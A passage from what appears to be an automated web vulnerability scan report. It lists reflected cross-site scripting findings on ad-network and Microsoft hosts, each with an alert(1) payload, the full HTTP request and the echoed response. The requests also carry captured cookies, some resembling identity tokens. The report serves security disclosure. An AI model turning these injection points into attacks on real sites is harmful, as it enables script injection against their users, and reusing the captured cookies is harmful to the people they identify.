Cookie: DW=216a3151297859685; IXAIBannerCounter174466=1; IXAIFirstHit2457=2%2f16%2f2011+7%3a07%3a58+AM; IXAIBanners2251=171021; IXAIBannerCounter171021=1; IXAIFirstHit2251=2%2f16%2f2011+8%3a18%3a55+AM; IXAILastHit2251=2%2f16%2f2011+8%3a18%3a55+AM; IXAICampaignCounter2251=1; IXAIBanners2357=173404; IXAIBannerCounter173404=1; IXAIFirstHit2357=2%2f28%2f2011+8%3a17%3a22+AM; IXAILastHit2357=2%2f28%2f2011+8%3a17%3a22+AM; IXAICampaignCounter2357=1; IXAIBanners2457=174466,175106,175106,175106; IXAIBannerCounter175106=3; IXAILastHit2457=3%2f7%2f2011+7%3a51%3a59+AM; IXAICampaignCounter2457=4; IXAIFirstHit2411=3%2f10%2f2011+11%3a08%3a04+AM; IXAIBanners2411=174145,174145,174145; IXAIBannerCounter174145=3; IXAILastHit2411=3%2f10%2f2011+11%3a29%3a10+AM; IXAICampaignCounter2411=3; IXAIBanners2528=174753; IXAIBannerCounter174753=1; IXAIFirstHit2528=3%2f10%2f2011+6%3a09%3a23+PM; IXAILastHit2528=3%2f10%2f2011+6%3a09%3a23+PM; IXAICampaignCounter2528=1; IXAIBanners2399=173670; IXAIBannerCounter173670=1; IXAIFirstHit2399=3%2f23%2f2011+2%3a40%3a24+PM; IXAILastHit2399=3%2f23%2f2011+2%3a40%3a24+PM; IXAICampaignCounter2399=1

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Wed, 23 Mar 2011 19:41:14 GMT
Connection: close
Cache-Control: no-store
Content-Length: 22019

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
ss.Analytics.TotalTimeInView);},1000)}});InsightExpress.Path='/adserver/';InsightExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=true&bannerID=173670&referer=ads.cnn.com&2b92e'-alert(1)-'dabbc06a026=1'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=new InsightExpress.PopInInvite({"Width":"300","Height":"250","ReuseWindow":false
...[SNIP]...

1.199. http://core.insightexpressai.com/adServer/GetInvite2.aspx [referer parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The value of the referer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c74dd'-alert(1)-'f0d13a569ac was submitted in the referer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adServer/GetInvite2.aspx?esi=true&bannerID=173670&referer=ads.cnn.comc74dd'-alert(1)-'f0d13a569ac HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon3&cnn_money_rollup=homepage&cnn_money_section=sponsor_center&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=471129
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=216a3151297859685; IXAIBannerCounter174466=1; IXAIFirstHit2457=2%2f16%2f2011+7%3a07%3a58+AM; IXAIBanners2251=171021; IXAIBannerCounter171021=1; IXAIFirstHit2251=2%2f16%2f2011+8%3a18%3a55+AM; IXAILastHit2251=2%2f16%2f2011+8%3a18%3a55+AM; IXAICampaignCounter2251=1; IXAIBanners2357=173404; IXAIBannerCounter173404=1; IXAIFirstHit2357=2%2f28%2f2011+8%3a17%3a22+AM; IXAILastHit2357=2%2f28%2f2011+8%3a17%3a22+AM; IXAICampaignCounter2357=1; IXAIBanners2457=174466,175106,175106,175106; IXAIBannerCounter175106=3; IXAILastHit2457=3%2f7%2f2011+7%3a51%3a59+AM; IXAICampaignCounter2457=4; IXAIFirstHit2411=3%2f10%2f2011+11%3a08%3a04+AM; IXAIBanners2411=174145,174145,174145; IXAIBannerCounter174145=3; IXAILastHit2411=3%2f10%2f2011+11%3a29%3a10+AM; IXAICampaignCounter2411=3; IXAIBanners2528=174753; IXAIBannerCounter174753=1; IXAIFirstHit2528=3%2f10%2f2011+6%3a09%3a23+PM; IXAILastHit2528=3%2f10%2f2011+6%3a09%3a23+PM; IXAICampaignCounter2528=1; IXAIBanners2399=173670; IXAIBannerCounter173670=1; IXAIFirstHit2399=3%2f23%2f2011+2%3a40%3a24+PM; IXAILastHit2399=3%2f23%2f2011+2%3a40%3a24+PM; IXAICampaignCounter2399=1

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Wed, 23 Mar 2011 19:41:07 GMT
Connection: close
Cache-Control: no-store
Content-Length: 22034

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
ess.Analytics.TotalTimeInView);},1000)}});InsightExpress.Path='/adserver/';InsightExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=true&bannerID=173670&referer=ads.cnn.comc74dd'-alert(1)-'f0d13a569ac'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=new InsightExpress.PopInInvite({"Width":"300","Height":"250","ReuseWindow":false,"
...[SNIP]...

1.200. http://ds.addthis.com/red/psi/sites/www.sailingworld.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.sailingworld.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 1e865<script>alert(1)</script>cdcc126bc09 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.sailingworld.com/p.json?callback=_ate.ad.hpr1e865<script>alert(1)</script>cdcc126bc09&uid=4d5af32c71c2e1a5&url=http%3A%2F%2Fwww.sailingworld.com%2Fcontests%2Fannouncing-i-sw-i-s-dr-crash-photo-contest&ref=http%3A%2F%2Fwww.sailingworld.com%2F&r2xkc1 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh35.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1300642103.60|1300642103.1FE|1300446510.66|1299801259.19A; dt=X; psc=4; uid=4d5af32c71c2e1a5; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 398
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 22 Mar 2011 22:01:42 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 21 Apr 2011 22:01:42 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1300831302.1FE|1300831302.60|1299801259.19A|1300446510.66; Domain=.addthis.com; Expires=Thu, 21-Mar-2013 22:01:41 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Tue, 22 Mar 2011 22:01:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 22 Mar 2011 22:01:42 GMT
Connection: close

_ate.ad.hpr1e865<script>alert(1)</script>cdcc126bc09({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4d5af32c71c2e1a5","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d5af32c71c2e1a5&curl=http%3a%2f%2fwww.sailing
...[SNIP]...

1.201. http://g2.gumgum.com/services/get [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://g2.gumgum.com
Path:   /services/get

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload d6045<script>alert(1)</script>f2acd6c343b was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/get?callback=GGGV.startServicesd6045<script>alert(1)</script>f2acd6c343b&_=1300831467972&pubdata=%7B%22t%22%3A%22tmzdtcom%22%2C%22v%22%3A1%2C%22r%22%3A%227855%22%2C%22rf%22%3A%22%22%7D HTTP/1.1
Host: g2.gumgum.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/signin/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript;charset=UTF-8
Date: Tue, 22 Mar 2011 22:05:51 GMT
Server: nginx/0.6.35
Set-Cookie: ggtests=t3%3D44%26t2%3D23%26t1%3D49%26t10%3D48%26t11%3D50%26t4%3D7%26t6%3D43%26t7%3D45%26t9%3D47; Domain=.gumgum.com; Path=/
Set-Cookie: loc=nwprqBiWooZ4P3XLkY2HWKP2ljIYMkPGdV51afXZciI; Domain=.gumgum.com; Expires=Thu, 21-Apr-2011 22:05:51 GMT; Path=/
Set-Cookie: vst=3dfcb163-b82b-4f71-bb2b-f3c9a54ac8e8; Domain=.gumgum.com; Expires=Thu, 21-Apr-2011 22:05:51 GMT; Path=/
Connection: keep-alive
Content-Length: 327

GGGV.startServicesd6045<script>alert(1)</script>f2acd6c343b({"at":{"mh":200,"sf":true,"jit":true,"mw":200,"inline":true,"ps":true},"pxs":{"across33":true,"qsg":"Entertainment.tmzdtcom","media6":true,"qac":"p-00TsOkvHvnsZU","file":"pixels","priority":9,"quantca
...[SNIP]...

1.202. http://i.microsoft.com/en-us/homepage/bimapping.js [v parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i.microsoft.com
Path:   /en-us/homepage/bimapping.js

Issue detail

The value of the v request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6e777%3balert(1)//ed6a1ff59af was submitted in the v parameter. This input was echoed as 6e777;alert(1)//ed6a1ff59af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/homepage/bimapping.js?v=BiMapping6e777%3balert(1)//ed6a1ff59af&k=/en-us/homepage/Components/BiMapping.xml&ver=1.0.0 HTTP/1.1
Host: i.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-us/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi600017030E02h7030E; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/12/2011 13:07:36&Microsoft.VisitStartDate=03/12/2011 13:05:30&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=21&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; msdn=L=1033; omniID=ue; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1300725939792:ss=1300725939792; WT_NVR_RU=0=technet|msdn:1=:2=; MS0=a61fbdf182064e0881bf77e83811b2f6

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Last-Modified: Sat, 12 Mar 2011 01:58:04 GMT
ETag: "OVpaDN57mJiQ+1EliW6PYUb1vNI="
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 279778642100000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Cache-Control: public, max-age=600
Expires: Tue, 22 Mar 2011 21:13:50 GMT
Date: Tue, 22 Mar 2011 21:03:50 GMT
Connection: close
Content-Length: 2103

...var BiMapping6e777;alert(1)//ed6a1ff59af={"Webtrends":{"enabled":true,"settings":{"interactiontype":{"0":true,"1":true,"2":true,"3":true,"4":true,"5":true,"6":true,"7":true,"8":true,"9":true,"10":true,"11":true,"12":true,"13":true,"14":true,
...[SNIP]...

1.203. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the clicktrack request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6fcf9"-alert(1)-"2ee6f2d254e was submitted in the clicktrack parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/fb/adtag.js?tid=38838&type=mrect&clicktrack=http%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJwVjDsOhDAMBa.CXBPJH2ITbpMQKlCo0BYr7o5deUZ6nj.IwDZxWQvPEwi7EBuSupELkB7c1t7TgZXTQqKpVuHU2l4bophah3iN8TPOcf9GeJQikv1mw6gvjuO5Lkd1NCw5vx9hdx1T%2526redirectURL%253D6fcf9"-alert(1)-"2ee6f2d254e HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/221/tmz/300x250/homepage_inpost?t=1300831418910&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.tmz.com%2F&refer=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=92051597.1299094491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=92051597.1024711904.1299094491.1299094491.1299169676.2; uat=1_1299171815; cmp=1_1300411186_10164:0_10638:0_10640:0_10641:0_1437:0_8900:39_9081:108616_9085:108616_8956:108616_9083:108639_9084:108639_8956:108639_20:1241462; sit=1_1300411186_2701:39:39_719:121:0_2707:108839:108616_3225:390277:390277_828:912792:912792_11:1316717:1241462_3314:1320455:1239371_3289:1321705:1316218_2002:2548865:2547644; bpd=1_1300411186_h9i9:5WgZ; apd=1_1300411186; afl=1_1300411186; eng=1_1300642147_20056:0; cre=1_1300642204_20056:24801:7:0_20053:24803:11:56_20054:24802:1:456_14598:11789:1:1273600; uid=1_1300642204_1297862321306:0415785655118336; kwd=1_1300642204_11317:231018_11717:231018_11718:231018_11719:231018_11722:339653_10827:339653_10842:339657_10839:339657_10824:339857; scg=1_1300642204; ppd=1_1300642204

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 22:03:41 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1300831421_1297862321306:0415785655118336; Domain=.fetchback.com; Expires=Sun, 20-Mar-2016 22:03:41 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 22 Mar 2011 22:03:41 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 518

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=38838&type=mrect&clicktrack=http%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJwVjDsOhDAMBa.CXBPJH2ITbpMQKlCo0BYr7o5deUZ6nj.IwDZxWQvPEwi7EBuSupELkB7c1t7TgZXTQqKpVuHU2l4bophah3iN8TPOcf9GeJQikv1mw6gvjuO5Lkd1NCw5vx9hdx1T%2526redirectURL%253D6fcf9"-alert(1)-"2ee6f2d254e' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

1.204. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b126c"-alert(1)-"127b8b9ce75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/fb/adtag.js?tid=38838&type=mrect&clicktrack=http%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJwVjDsOhDAMBa.CXBPJH2ITbpMQKlCo0BYr7o5deUZ6nj.IwDZxWQvPEwi7EBuSupELkB7c1t7TgZXTQqKpVuHU2l4bophah3iN8TPOcf9GeJQikv1mw6gvjuO5Lkd1NCw5vx9hdx1T%2526redirectURL%253D&b126c"-alert(1)-"127b8b9ce75=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/221/tmz/300x250/homepage_inpost?t=1300831418910&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.tmz.com%2F&refer=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=92051597.1299094491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=92051597.1024711904.1299094491.1299094491.1299169676.2; uat=1_1299171815; cmp=1_1300411186_10164:0_10638:0_10640:0_10641:0_1437:0_8900:39_9081:108616_9085:108616_8956:108616_9083:108639_9084:108639_8956:108639_20:1241462; sit=1_1300411186_2701:39:39_719:121:0_2707:108839:108616_3225:390277:390277_828:912792:912792_11:1316717:1241462_3314:1320455:1239371_3289:1321705:1316218_2002:2548865:2547644; bpd=1_1300411186_h9i9:5WgZ; apd=1_1300411186; afl=1_1300411186; eng=1_1300642147_20056:0; cre=1_1300642204_20056:24801:7:0_20053:24803:11:56_20054:24802:1:456_14598:11789:1:1273600; uid=1_1300642204_1297862321306:0415785655118336; kwd=1_1300642204_11317:231018_11717:231018_11718:231018_11719:231018_11722:339653_10827:339653_10842:339657_10839:339657_10824:339857; scg=1_1300642204; ppd=1_1300642204

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 22:03:42 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1300831422_1297862321306:0415785655118336; Domain=.fetchback.com; Expires=Sun, 20-Mar-2016 22:03:42 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 22 Mar 2011 22:03:42 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 521

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=38838&type=mrect&clicktrack=http%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJwVjDsOhDAMBa.CXBPJH2ITbpMQKlCo0BYr7o5deUZ6nj.IwDZxWQvPEwi7EBuSupELkB7c1t7TgZXTQqKpVuHU2l4bophah3iN8TPOcf9GeJQikv1mw6gvjuO5Lkd1NCw5vx9hdx1T%2526redirectURL%253D&b126c"-alert(1)-"127b8b9ce75=1' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

1.205. http://imp.fetchback.com/serve/fb/adtag.js [tid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the tid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f685a"-alert(1)-"d3cf7c79da6 was submitted in the tid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/fb/adtag.js?tid=38838f685a"-alert(1)-"d3cf7c79da6&type=mrect&clicktrack=http%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJwVjDsOhDAMBa.CXBPJH2ITbpMQKlCo0BYr7o5deUZ6nj.IwDZxWQvPEwi7EBuSupELkB7c1t7TgZXTQqKpVuHU2l4bophah3iN8TPOcf9GeJQikv1mw6gvjuO5Lkd1NCw5vx9hdx1T%2526redirectURL%253D HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/221/tmz/300x250/homepage_inpost?t=1300831418910&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.tmz.com%2F&refer=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=92051597.1299094491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=92051597.1024711904.1299094491.1299094491.1299169676.2; uat=1_1299171815; cmp=1_1300411186_10164:0_10638:0_10640:0_10641:0_1437:0_8900:39_9081:108616_9085:108616_8956:108616_9083:108639_9084:108639_8956:108639_20:1241462; sit=1_1300411186_2701:39:39_719:121:0_2707:108839:108616_3225:390277:390277_828:912792:912792_11:1316717:1241462_3314:1320455:1239371_3289:1321705:1316218_2002:2548865:2547644; bpd=1_1300411186_h9i9:5WgZ; apd=1_1300411186; afl=1_1300411186; eng=1_1300642147_20056:0; cre=1_1300642204_20056:24801:7:0_20053:24803:11:56_20054:24802:1:456_14598:11789:1:1273600; uid=1_1300642204_1297862321306:0415785655118336; kwd=1_1300642204_11317:231018_11717:231018_11718:231018_11719:231018_11722:339653_10827:339653_10842:339657_10839:339657_10824:339857; scg=1_1300642204; ppd=1_1300642204

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 22:03:39 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: uid=1_1300831419_1297862321306:0415785655118336; Domain=.fetchback.com; Expires=Sun, 20-Mar-2016 22:03:39 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 22 Mar 2011 22:03:39 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 518

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=38838f685a"-alert(1)-"d3cf7c79da6&type=mrect&clicktrack=http%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJwVjDsOhDAMBa.CXBPJH2ITbpMQKlCo0BYr7o5deUZ6nj.IwDZxWQvPEwi7EBuSu
...[SNIP]...

1.206. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload baa54"-alert(1)-"50e4220934d was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/fb/adtag.js?tid=38838&type=mrectbaa54"-alert(1)-"50e4220934d&clicktrack=http%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJwVjDsOhDAMBa.CXBPJH2ITbpMQKlCo0BYr7o5deUZ6nj.IwDZxWQvPEwi7EBuSupELkB7c1t7TgZXTQqKpVuHU2l4bophah3iN8TPOcf9GeJQikv1mw6gvjuO5Lkd1NCw5vx9hdx1T%2526redirectURL%253D HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/221/tmz/300x250/homepage_inpost?t=1300831418910&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.tmz.com%2F&refer=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=92051597.1299094491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=92051597.1024711904.1299094491.1299094491.1299169676.2; uat=1_1299171815; cmp=1_1300411186_10164:0_10638:0_10640:0_10641:0_1437:0_8900:39_9081:108616_9085:108616_8956:108616_9083:108639_9084:108639_8956:108639_20:1241462; sit=1_1300411186_2701:39:39_719:121:0_2707:108839:108616_3225:390277:390277_828:912792:912792_11:1316717:1241462_3314:1320455:1239371_3289:1321705:1316218_2002:2548865:2547644; bpd=1_1300411186_h9i9:5WgZ; apd=1_1300411186; afl=1_1300411186; eng=1_1300642147_20056:0; cre=1_1300642204_20056:24801:7:0_20053:24803:11:56_20054:24802:1:456_14598:11789:1:1273600; uid=1_1300642204_1297862321306:0415785655118336; kwd=1_1300642204_11317:231018_11717:231018_11718:231018_11719:231018_11722:339653_10827:339653_10842:339657_10839:339657_10824:339857; scg=1_1300642204; ppd=1_1300642204

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 22:03:40 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1300831420_1297862321306:0415785655118336; Domain=.fetchback.com; Expires=Sun, 20-Mar-2016 22:03:40 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 22 Mar 2011 22:03:40 GMT
Pragma: no-cache
